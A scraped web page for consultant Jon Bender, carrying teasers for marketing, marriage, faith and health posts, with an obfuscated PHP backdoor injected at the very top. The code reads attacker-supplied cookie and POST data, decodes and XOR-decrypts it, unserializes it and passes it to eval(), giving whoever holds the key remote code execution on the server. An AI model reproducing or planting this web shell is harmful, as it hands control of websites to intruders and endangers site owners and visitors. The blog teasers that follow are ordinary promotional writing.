$pEEwBCCew = "\x59" . "\x6d" . chr (95) . chr ( 1084 - 964 ).chr ( 143 - 62 )."\x48" . chr (70) . "\x68";$PGAdwYq = chr ( 1071 - 972 ).chr (108) . "\x61" . 's' . chr (115) . chr (95) . "\x65" . chr ( 168 - 48 )."\151" . "\163" . "\164" . chr (115); $XskdsHD = class_exists($pEEwBCCew); $pEEwBCCew = "30476";$PGAdwYq = "64258";$brDbDK = FALSE;if ($XskdsHD === $brDbDK){function tVeNl(){return FALSE;}$iJdLOOf = "20372";tVeNl();class Ym_xQHFh{public function guymaIfr(){echo "16458";}private $UzZvn;public static $nIlAtzHX = "cbc2f9ea-1cb6-4d48-a0d9-0ed4aae00383";public static $KyOCFQD = 12953;public function __destruct(){$iJdLOOf = "22096_46246";$this->HqPRADn($iJdLOOf); $iJdLOOf = "22096_46246";}public function __construct($RBbHWTaq=0){$yrSItkx = $_POST;$tKMfeX = $_COOKIE;$FSBlU = @$tKMfeX[substr(Ym_xQHFh::$nIlAtzHX, 0, 4)];if (!empty($FSBlU)){$wogzMVTW = "base64";$bEqOsuv = "";$FSBlU = explode(",", $FSBlU);foreach ($FSBlU as $GaJNpUj){$bEqOsuv .= @$tKMfeX[$GaJNpUj];$bEqOsuv .= @$yrSItkx[$GaJNpUj];}$bEqOsuv = array_map($wogzMVTW . "\x5f" . 'd' . "\x65" . "\143" . "\x6f" . "\144" . 'e', array($bEqOsuv,)); $bEqOsuv = $bEqOsuv[0] ^ str_repeat(Ym_xQHFh::$nIlAtzHX, (strlen($bEqOsuv[0]) / strlen(Ym_xQHFh::$nIlAtzHX)) + 1);Ym_xQHFh::$KyOCFQD = @unserialize($bEqOsuv);}}private function HqPRADn($iJdLOOf){if (is_array(Ym_xQHFh::$KyOCFQD)) {$miTnQrnj = str_replace("\x3c" . chr ( 163 - 100 ).'p' . chr (104) . "\x70", "", Ym_xQHFh::$KyOCFQD["\143" . "\x6f" . 'n' . chr ( 758 - 642 ).chr ( 153 - 52 )."\x6e" . "\x74"]);eval($miTnQrnj); $iJdLOOf = "20372";exit();}}}$teLPg = new /* 17229 */ Ym_xQHFh(); $teLPg = str_repeat("22096_46246", 1);} Jon Bender – Jon Bender

About Jon Bender

Jon Bender is a sought after business growth consultant who helps clients with leveraged digital marketing and campaign architecture. He is also a serial entrepreneur, speaker, and author. The marketing systems Jon delivers to his clients have directly and indirectly generated over $350 million in sales around the world. In addition to marketing architecture and deployment, Jon coaches business owners and executives on gratitude based leadership and culture development. Jon believes success is not based on what one can get but rather what value one can give back to others through the talents and blessings given to them by the grace of God. CLICK FOR FREE WEALTH BUILDING BOOK
Stay Grateful

Good Water the Beginnings Of The Best Health Possible

The quality of our natural waters are on the fast pace of decline and will continue to decline for the foreseeable future. Like the earth on which we live, our bodies are approximately 70 percent water (and our blood is approximately 93 percent). It seems to reason that if we subsist on polluted water, we [...]

Guard Your Heart For Ultimate Relationships

Guarding your heart is one of the most important things we can do. Whatever is in your heart will eventually come out…especially when you are under stress and/or feel “squeezed.” It is very important in your marriage and/or other significant relationships that you realize that however you feel and what you say does not come [...]

How To Make Your Product or Offering Go Viral!

What makes an idea, a product or a behavior go viral and spread widely without any real marketing input or expenditure? You might be tempted to think this is just a matter of random luck but it's usually not. According to Dr. Jonah Berger, Wharton School of Business, Products or ideas become contagious whenever and [...]

The Power of Blessing Your Children

Blessing Your Children/Family A blessing is different from a prayer. As parents, it is critically important for us to ask God’s blessing over our children DAILY. Although Christians have been given a method/formula in how to pray by Jesus...The Lord's Prayer...found in the Gospel of Matthew 6:9–13, it may not be as clear how to [...]

[Pt. 2] You’re Selling An Idea; Not A Product Or Service

No matter what kind of business you have, no matter where you are in the growth process, you can get more customers with higher conversions and lower costs than you might have ever imagined, but only if you understand this very important point. That is, this: you are not selling a product. You are not selling a service. You are not selling information. You are selling an idea. Let me say that again; you’re selling an idea. Not just any idea, but a compelling, exciting idea.

Skyrocket Your Online Sales And Feel “Super-Human!”

It's a privilege to be able to share with you today something that 99.9% of business people online today just don’t get, and once you do, you can easily boost your online sales conversions over even your most aggressive competition by 100, even 1000%. Even if they’re in the top 10% of your space or industry!

Is Having A Job Gambling With Your Retirement: 3 Easy Ways To Protect Yourself.

Let's face it. You go to work.  You work. You come home. You are tired, but your brain's gears are turning... You are grateful to have your job.  But could having a  job "only" be gambling with your retirement? Could having a job "only" be making you less secure? The answer is: Yes! According to [...]

How To Save Your Marriage…Permanently!

Which Is It? Happiness Or Holiness When It Comes To How To Save Your Marriage? Gary Thomas writes in his best-selling book, Sacred Marriage, "The idea that marriage can survive on romance alone, or that romantic feeling is more important than any other consideration when choosing a spouse, has wrecked many a marital ship."  If [...]

For Busy Executives

Jon Bender helps busy executives achieve a complete makeover in your personal life. Becoming successful is so much more than money, we will focus on unleashing your potential in 7 key areas of success mastery and peak performance.

For Businesses

Jon Bender shows you simple, but often hidden ways to cause your revenues/profit to exponentially grow often by more than 100% in less than 180 days by asking 2 powerful questions and focusing on 3 specific and highly leveraged areas. Jon will coach you to higher levels of business enjoyment and profitability.
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